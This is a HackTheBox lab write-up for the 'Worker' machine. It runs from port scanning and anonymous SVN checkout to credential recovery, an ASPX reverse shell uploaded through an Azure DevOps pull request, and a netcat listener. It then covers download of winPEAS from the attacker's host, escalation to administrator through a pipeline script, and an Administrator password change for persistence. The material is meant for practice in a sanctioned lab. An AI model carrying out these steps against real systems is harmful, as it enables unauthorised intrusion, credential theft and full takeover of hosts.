Worker - HackTheBox Writeup (10.10.10.203)

Recon

• Port scan:

  $ nmap -p- 10.10.10.203 > ports.nmap

  PORT     STATE SERVICE
  80/tcp   open  http
  3690/tcp open  svn
  5985/tcp open  wsman

• Targeted scan:

  $ nmap -sC -sV -p 80,3690,5985 10.10.10.203 > scan.nmap

  PORT     STATE SERVICE  VERSION
  80/tcp   open  http     Microsoft IIS httpd 10.0
  | http-methods: 
  |_  Potentially risky methods: TRACE
  |_http-server-header: Microsoft-IIS/10.0
  |_http-title: IIS Windows Server
  3690/tcp open  svnserve Subversion
  5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

  IIS HTTP, Subversion, HTTP/WinRM (?).

Enumeration

• Brute force directories with DirBuster: Found nothing.
• Scan SVN with nmap's svn-brute script:

  $ nmap -p 3690 --script svn-brute 10.10.10.203

  PORT     STATE SERVICE
  3690/tcp open  svn
  |_svn-brute: No repository specified (see svn-brute.repo)

• No repository is specified, rescan using repo path svn-brute.repo=/svn/:

  $ nmap -p 3690 --script svn-brute --script-args svn-brute.repo=/svn/ 10.10.10.203

  PORT STATE SERVICE
  3690/tcp open svn
  | svn-brute:
  |_ Anonymous SVN detected, no authentication needed

  No auth needed on SVN.

• Checkout repo:

  $ svn checkout svn://10.10.10.203

• Found repo name and possible domain name: dimension.worker.htb
• Found file: moved.txt

  $ cat moved.txt

  This repository has been migrated and will no longer be maintaned here.
  You can find the latest version at: http://devops.worker.htb
  
  // The Worker team :)

• Found domain name: devops.worker.htb
• Adding found domains to /etc/hosts:

  10.10.10.203 devops.worker.htb dimension.worker.htb

• Navigate to new domains:

  devops.worker.htb is a Azure DevOps server.

  TF400813: Resource not available for anonymous access. Client authentication required.

  dimension.worker.htb is a standard webserver with links to projects.

• Found more domains on dimension.worker.htb: http://alpha.worker.htb/ http://cartoon.worker.htb/ http://lens.worker.htb/ http://solid-state.worker.htb/ http://spectral.worker.htb/ http://story.worker.htb/
• Found hidden directory .svn, with ./wc.db database file
• Found possible username: nathen
• Checkout older version of repo:

  $ svn co -r 2 svn://10.10.10.203

• Found ./deploy.ps1:

  $ cat deploy.ps1

  $user = "nathen"
  $plain = "wendel98"
  $pwd = ($plain | ConvertTo-SecureString)
  $Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
  $args = "Copy-Site.ps1"
  Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

• Found credentials: nathen:wendel98
• Try to login to Azure DevOps with credentials, success.
• Try to evil-winrm with credentials, failed to connect.

Exploitation

• Azure DevOps has a feature to upload files onto repositories, but it must be done with a pull request on a separate branch.
• Using ASPX shell, modify the file to include local address and port.

  $ nano ./shell.aspx

  String host = "10.10.14.45";
  int port = 6969;

• Upload the shell onto a new branch of the alpha repo in the Hotel project, make sure to link the PR to a work item, create one if needed.
• Self-approve PR and commit to master.

  

• Listen for a reverse shell with netcat:

  $ nc -lvnp 6969

• Navigate to http://alpha.worker.htb/shell.aspx
• Get shell under iis:

  $ id

  uid=4294967295(Unknown+User) gid=4294967295(Unknown+Group)

  $ whoami

  iis apppool\defaultapppool

• Found usernames in C:\Users: restorer, robisl
• Host winPEAS.exe on local HTTP:

  $ cp ./winPEAS.exe ../Worker/www/

  $ python3 -m SimpleHTTPServer

• curl from host to local HTTP:

  $ cd C:\Users\Public\Downloads\

  $ curlhttp://10.10.14.54:8000/winPEAS.exe> winPEAS.exe

• Run winPEAS.exe:

  $ winPEAS.exe

  [+] Looking AppCmd.exe
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
  		AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials
  [+] Network Shares
  		ADMIN$ (Path: C:\Windows)
  		C$ (Path: C:\)
  		IPC$ (Path: )
  		W$ (Path: W:\)

• Try to connect to W$ share with smbclient:

  $ smbclient -L 10.10.10.203

  Failed to connect.

• Investigate mysterious W:\ drive:

  [+] Drives Information
  [?] Remember that you should search more info inside the other drives
  		C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 9 GB)(Permissions: Users [AppendData/CreateDirectories])
  		W:\ (Type: Fixed)(Volume label: Work)(Filesystem: NTFS)(Available space: 17 GB)(Permissions: Users [AppendData/CreateDirectories])

• Go to W:\: $ W:
• Found W:\svnrepos\www\conf\authz:

  [aliases]
  # joe = /C=XZ/ST=Dessert/L=Snake City/O=Snake Oil, Ltd./OU=Research Institute/CN=Joe Average
  [groups]
  # harry_and_sally = harry,sally
  # harry_sally_and_joe = harry,sally,&joe
  # [/foo/bar]
  # harry = rw
  # &joe = r
  # * =
  # [repository:/baz/fuz]
  # @harry_and_sally = rw
  # * = r

• Found W:\svnrepos\www\conf\passwd:

  robisl = wolves11

• Found new credentials: robisl:wolves11
• Remote into machine as robisl with evil-winrm:

  $ evil-winrm -i 10.10.10.203 -u robisl -p wolves11

• Get user flag!

Privilege Escalation

• Check directory listings, ls -la equivalent on PowerShell:

  $ Get-ChildItem -Force

• Check user's privileged access, similar to sudo -l but on PowerShell:

  $ whoami /priv

  Nothing of interest...

• Login to Azure DevOps as robisl using new credentials.
• Found new project in robisl's DevOps account: PartsUnlimited
• Using DevOps' Pipelines module, we can execute arbitrary code.
• Create a new starter pipeline on an unspecified pool, add robisl to the administrators group and print root.txt flag:

  

  #pool = default
  
  steps:
  	- script:
  			net localgroup administrators robisl /add
  			type C:\Users\Administrator\Desktop\root.txt
  		displayName: 'pwn'

• Create pull request on a separate branch, create a new work item and self-approve the PR if needed.
• Run pipeline to execute the payload:

  Script contents:
  net localgroup administrators robisl /add
  ========================== Starting Command Output ===========================
  ##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\7f15fa97-c09c-4b50-be25-fa598fdfa45a.cmd""
  The command completed successfully.
  ##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\1fb5e08b-f36c-4bd4-8684-7895df0593ae.cmd""
  f71dca4e----------------068f6546

• Check new group permissions:

  $ net user robisl

  Local Group Memberships *Administrators *Production
  *Remote Management Use
  Global Group memberships *None

• Rob is now in the Administrators group.
• Get root flag!

Persistence

• Change Administrator password and enable remote use:

  $ net localgroup "Remote Management Users" administrator /add

  $ net user administrator mango1010!

• Remote into Administrator with evil-winrm:

  $ evil-winrm -i 10.10.10.203 -u Administrator -p mango1010!

Resources

1. https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx
2. https://www.youtube.com/watch?v=p7a25FEmd6A